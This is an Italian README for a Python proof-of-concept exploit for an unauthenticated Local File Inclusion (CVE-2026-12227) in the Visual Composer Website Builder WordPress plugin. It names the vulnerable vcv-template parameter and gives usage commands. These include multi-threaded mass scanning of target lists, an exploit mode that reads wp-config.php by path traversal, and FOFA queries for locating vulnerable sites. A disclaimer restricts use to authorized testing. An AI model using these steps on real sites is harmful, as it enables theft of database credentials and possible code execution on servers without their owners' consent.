CVE-2026-12227 — Visual Composer Website Builder LFI non autenticato
PoC in Python 3 per CVE-2026-12227 (Wordfence): Local File Inclusion tramite il parametro di query vcv-template in Visual Composer Website Builder (visualcomposer su wordpress.org).
| |
|---|
| Piattaforma | Plugin WordPress |
| Componente | Visual Composer Website Builder |
| Affetto | ≤ 45.16.0 |
| Corretto in | > 45.16.0 (WP Trac 3619572) — usare l'ultima versione stabile (es. 45.16.3+) |
| CVSS | 9.8 Critico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Auth | Non autenticato |
| CWE | CWE-98 |
| Non | WPBakery (js_composer) o SAP NetWeaver Visual Composer |
Riepilogo
Sulle versioni vulnerabili, il caricamento di pagine pubbliche rispetta il parametro vcv-template controllato dall'attaccante (con vcv-template-type) durante la gestione di template_include di WordPress all'interno di PageTemplatesController. Ciò può includere file scelti dall'attaccante presenti sul disco; i file PHP potrebbero essere eseguiti (RCE). Wordfence segnala catene con estensioni "sicure" caricate in alcune configurazioni.
Superficie d'attacco
- Richiede il plugin installato e una pagina front-end costruita con VC (permalink normale).
- La sonda aggiunge parametri di query, es.
?vcv-template-type=vc&vcv-template=blank o percorsi LFI sotto vcv-template.
- Parametri correlati:
vcv-template-type, vcv-template-stretched.
Requisiti
pip install -r requirements.txt
Python 3.8+.
Utilizzo
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check
# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /
# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet
# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php
# JSON for scripting
python poc.py -u https://target.example --mode check --json
Output
| File | Significato |
|---|
cve_2026_12227_results.jsonl | JSON completo per target |
Valori di stato
Suggerimenti FOFA
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"
Note tecniche
- Percorso del codice:
visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
- Check considera il controllo del parametro o i marcatori LFI come
exploitable_candidate; confermare su un clone di staging prima di assumere RCE.
- Gli addon premium TemplateFilter / theme-builder possono ampliare i percorsi raggiungibili su alcuni siti.
Legale
Utilizzare solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione al test.